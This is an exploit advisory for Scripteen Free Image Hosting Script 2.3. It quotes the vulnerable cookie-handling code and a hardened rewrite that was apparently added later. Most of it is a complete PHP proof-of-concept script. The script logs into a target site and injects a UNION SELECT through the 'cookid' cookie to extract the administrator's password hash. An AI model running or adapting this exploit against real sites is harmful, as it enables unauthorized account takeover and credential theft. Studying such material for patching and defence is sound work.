Scripteen Free Image Hosting Script 2.3 SQL Injection Exploit
Source: www.vfcocus.net  Author: Coksnuss  Published: 2009-07-27

===================
Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerability
===================

The vulnerable code: header.php (lines 53-62)

 $userid=$_SESSION['userid'];
 $usergid=$_SESSION['usergid'];
 if (!$userid || empty($userid) || $userid==""){
      $userid = $_COOKIE['cookid'];
 }
 if (!$usergid || empty($usergid) || $usergid==""){
      $usergid = $_COOKIE['cookgid'];
 }

As you can see, $_COOKIE['cookid'] and $_COOKIE['cookgid'] are not filtered before they are used in the database query, so they can be used for SQL injection.
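The same fallback written defensively, as an added example that is not Scripteen's code: cookie values are accepted only when they parse as positive integers and the id is bound as a prepared-statement parameter. The mysqli connection in $db and the users table columns (userid, usergid, uname) are assumptions.

```php
<?php
// Added example: hardened rewrite of the header.php fallback quoted above.
// Not the project's code. Assumed: a mysqli connection in $db and a users
// table with integer userid/usergid columns and a uname column.

/** Accept a cookie value only if it is a positive integer; otherwise null. */
function cookie_int(array $cookie, string $name): ?int
{
    $v = filter_var($cookie[$name] ?? '', FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** Session first (server-side, not client-controlled), validated cookie second. */
function current_ids(array $session, array $cookie): array
{
    $userid  = !empty($session['userid'])  ? (int) $session['userid']
                                           : cookie_int($cookie, 'cookid');
    $usergid = !empty($session['usergid']) ? (int) $session['usergid']
                                           : cookie_int($cookie, 'cookgid');
    return [$userid, $usergid];
}

/** Prepared statement: the id is bound as an integer, never concatenated. */
function load_user(mysqli $db, int $userid): ?array
{
    $stmt = $db->prepare(
        'SELECT userid, usergid, uname FROM users WHERE userid = ?');
    $stmt->bind_param('i', $userid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

[$userid, $usergid] = current_ids($_SESSION ?? [], $_COOKIE);
if ($userid === null || $usergid === null) {
    // Fail closed: an absent or malformed id means "not logged in".
    header('Location: login.php');
    exit;
}
$user = load_user($db, $userid);
```

Integer validation plus parameter binding removes the injection, but a client-chosen cookid still selects the identity, so the fallback should be tied to a server-verified random token looked up in the database rather than to a raw user id.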

===================
Proof of concept
===================
<?php
// *************************************
// Global variables
// *************************************
$g_arguments = getArguments();
$g_url  = isset($g_arguments['url']) ? $g_arguments['url'] : false;
$g_username = isset($g_arguments['username']) ? $g_arguments['username'] : false;
$g_password = isset($g_arguments['password']) ? $g_arguments['password'] : false;
// *************************************

// *************************************
// Print help
// *************************************
if(isset($g_arguments['help']) || $g_url === false || $g_username === false || $g_password === false)
{
 echo "###################################\n";
 echo "#                                  \n";
 echo "# Scripteen Free Image Hosting V2.3\n";
 echo "#      SQL Injection Exploit       \n";
 echo "#      Discovered by Coksnuss      \n";
 echo "#      POC script by Coksnuss      \n";
 echo "#                                  \n";
 echo "###################################\n";
 
 echo "Usage: " . $argv[0] . "\n";
 echo "\t--help - This help\n";
 echo "\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)\n";
 echo "\t--username=[STR] - A valid username to login\n";
 echo "\t--password=[STR] - A valid password to login\n";
 die();
}
// *************************************


// *************************************
// Main
// *************************************
$url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url;
if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1);

// Get Cookie
echo "Generate cookie...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $url . '/login.php'); // use the normalised base URL computed above
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, 'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password));

$ret = curl_exec($curl);
curl_close($curl);

preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches);
// in_array with strict comparison: array_search would return 0 (falsy) for a match at index 0
if(!in_array('2.3', $matches[1], true))
 echo("\nWarning: It seems like this site does not use version 2.3 of the Scripteen Free Image Hosting Script!\n");

if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'))
 die('Be sure that you\'ve enabled CURL and have write permission in the script directory!');

echo "DONE\n";

// Get userid
echo "Get userid...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIEFILE, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match))
 die('Couldn\'t retrieve userid! Check your login data again!');

$userid = $match[1];
echo "DONE (" . $userid . ")\n";

// Get the password hash from userid 1
echo "Get the passwordhash from userid 1...\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIE, 'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match))
 die('Couldn\'t find the password hash!');

echo "Hash found: " . $match[1] . "\n";
// *************************************


// *************************************
// Global functions
// *************************************
function getArguments()
{
 global $argv;
 $args = array(); // initialise so an empty argument list does not return an undefined variable
 
 foreach($argv as $arg)
 {
  if(substr($arg, 0, 2) == '--')
  {
   // In case it is an argument with a value (e.g. --arg='1')
   if(($pos = strpos($arg, '=')) !== false)
   {
    $name = substr($arg, 2, ($pos - 2));
    $value = substr($arg, ($pos + 1));
    
    $args[$name] = $value;
   // Or just a flag (e.g. --help)
   } else {
    $name = substr($arg, 2);
    
    $args[$name] = true;
   }
  } else if($arg == $argv[0]) {
   $args[0] = $argv[0];
  }
 }
 
 return $args;
}
// *************************************
?>